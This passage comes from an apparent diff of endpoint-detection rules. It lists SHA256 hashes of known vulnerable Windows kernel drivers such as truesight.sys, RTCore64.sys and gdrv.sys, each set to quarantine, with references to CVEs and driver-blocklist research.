+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485833Z",
+ "creation_date": "2026-03-23T11:45:31.485837Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485847Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "04fb17d680c7c1ce2f971c2e17cd4108d2c995f9cc702d8da1fdd439bbd103ef",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "302c29f4-1254-5b9b-bc20-af456cfe1570",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489255Z",
+ "creation_date": 
"2026-03-23T11:45:31.489258Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.489266Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3697d13461d0bb6f23edc37d010869bdf421a51593fb264f2d1a38b8fdda755c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "30366c09-965f-531f-8451-cf776f6f7d5c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.472914Z",
+ "creation_date": "2026-03-23T11:45:30.472918Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.472927Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0e8595217f4457757bed0e3cdea25ea70429732b173bba999f02dc85c7e06d02",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3036e53f-17c1-55e2-8dd4-d2dc8cd599ff",
+ 
"test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156055Z",
+ "creation_date": "2026-03-23T11:45:31.156057Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156063Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ef856b5e6a5846b8aa505272515b762a5b18b8a0496fff4950488d17eefc2095",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3037de6b-ee20-5ca0-8ea3-5b7c48a5114d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487719Z",
+ "creation_date": "2026-03-23T11:45:31.487721Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": 
"2026-03-23T11:45:31.487726Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3fc98ecceccf767b976b7c4cd9f0aa5e0783e62da8ec5d52411d0b61686e4f24",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "306d5e2a-6d5b-5e05-94fe-bfdf81ba9fb9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480922Z",
+ "creation_date": "2026-03-23T11:45:30.480924Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480930Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7277130afa0b1506998d7bc58567b0d83f52a27175f4c7c4a7186347095fceed",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3072fd59-8f3d-575f-b644-b0a8b3a13f05",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": 
"critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500576Z",
+ "creation_date": "2026-03-23T11:45:31.500579Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500587Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5ffdcfce9414bc1d674d0fd7ae9a531cfc9217791d0d4ea929cddfbce02cc67f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "308162f9-c939-5503-8df3-6f059da42411",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460850Z",
+ "creation_date": "2026-03-23T11:45:30.460854Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460862Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": 
"5da0ffe33987f8d5fb9c151f0eff29b99f42233b27efcad596add27bdc5c88ff",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "30904c18-8ec2-596f-966b-074a79b80ea1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609129Z",
+ "creation_date": "2026-03-23T11:45:29.609131Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609137Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f4ff679066269392f6b7c3ba6257fc60dd609e4f9c491b00e1a16e4c405b0b9b",
+ "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3096dde6-140a-57af-a8a0-ca44f8585351",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153578Z",
+ "creation_date": 
"2026-03-23T11:45:31.153580Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153585Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "92bde364ca9d62fea430b42e32d3a4eeb9b2001bc30f85f0c152831ae47b1680",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "30a1a9c7-62d4-51f2-8fad-bb8466ce86bb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150160Z",
+ "creation_date": "2026-03-23T11:45:31.150161Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150167Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8ad4b24c22e3c23290097ba585975c79c16727e4dddbcbcbc02082949cab8310",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{ 
+ "id": "30a4f139-183a-5a19-923c-787ee9310cf2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830071Z",
+ "creation_date": "2026-03-23T11:45:31.830073Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830078Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b7b307837c1af0367f6f341ab69a915bf1f67d0107d489993511b6ff7e0c2751",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "30bc2798-87d5-5380-a2d7-03a7d89548b9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834897Z",
+ "creation_date": "2026-03-23T11:45:30.834901Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": 
"stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834911Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "43cfa6624c071648e67c03527b2dce064ff116b944431348380c8d74d3c39e3b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "30bf226d-06e6-5644-955c-56d0ddddeced",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613614Z",
+ "creation_date": "2026-03-23T11:45:29.613616Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613621Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "399effe75d32bdab6fa0a6bffe02dbf0a59219d940b654837c3be1c0bd02e9aa",
+ "comment": "Vulnerable Kernel Driver (aka AsrSetupDrv103.sys) [https://www.loldrivers.io/drivers/19003e00-d42d-4cbe-91f3-756451bdd7da/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "30cf82db-4ec2-57e1-82bc-854032dd265e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474559Z", + "creation_date": "2026-03-23T11:45:30.474563Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.474571Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a3a6146a681d25f7d8be88fb36e37821a351205d9be2843c4e7cc0b366984b39", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "30d7ce0d-8147-5428-9573-3cdbc2504450", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471539Z", + "creation_date": "2026-03-23T11:45:30.471543Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471552Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"b3e645e8817696fa5d5e2255f9328f3b6a2e5fce91737f4d654ff155dc9851e5", + "comment": "Vulnerable Kernel Driver (aka AsIO.sys) [https://www.loldrivers.io/drivers/bd7e78db-6fd0-4694-ac38-dbf5480b60b9/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "30deaf50-6a53-572a-8e2c-7e049a1c5699", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824664Z", + "creation_date": "2026-03-23T11:45:31.824666Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824672Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1b3cdee0d8bd1ba2745d26c5a00583677735063c693d6947b5d7657fe9289053", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "30e4b39f-ccf0-5a86-8cb5-c80b2abe598c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + 
}, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973234Z", + "creation_date": "2026-03-23T11:45:29.973236Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973242Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a3cf1a6edd205e04653b4338c077072ee753cde0a692490ecaf7afde27df5f0b", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "30f015e7-438e-5949-9ad6-3d04f8d543d6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476147Z", + "creation_date": "2026-03-23T11:45:31.476151Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476160Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bfda0d884c65b21699dd9f345fc78c1d684875d131fb46053526d491265eb357", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", 
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "30f50bc5-f7b4-5014-9038-68b9b452823f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974662Z", + "creation_date": "2026-03-23T11:45:29.974664Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974669Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3912c38f4c09b107ee9bbb60f43a8193d6bacf00bfb3b59b7b146d76594797cf", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "30ff047a-93d7-5a4b-b652-2daeff5203cb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488344Z", + "creation_date": "2026-03-23T11:45:31.488346Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488351Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "58a17f674f721cbf28ea2d27db218dc6926628fe663d1e7fc7fe9677b69fa395", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "310c3d06-dbe1-5bab-ae9f-47e0ed2cb117", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.623027Z", + "creation_date": "2026-03-23T11:45:29.623029Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.623035Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fb5e65aec819c5a91ef0ce0fec0a957826b5e1ac9bac559a1b4201a3870462a3", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3119f1e5-d603-5f84-bc80-1f2a095e9d56", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.826251Z", + "creation_date": "2026-03-23T11:45:31.826253Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.826261Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a57065508fcf79d4ada8dfff3960832fc5965e51733ae0aa3a5d280a4064e5c7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "3137042b-1339-507c-a5f2-44a47bff5d4d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 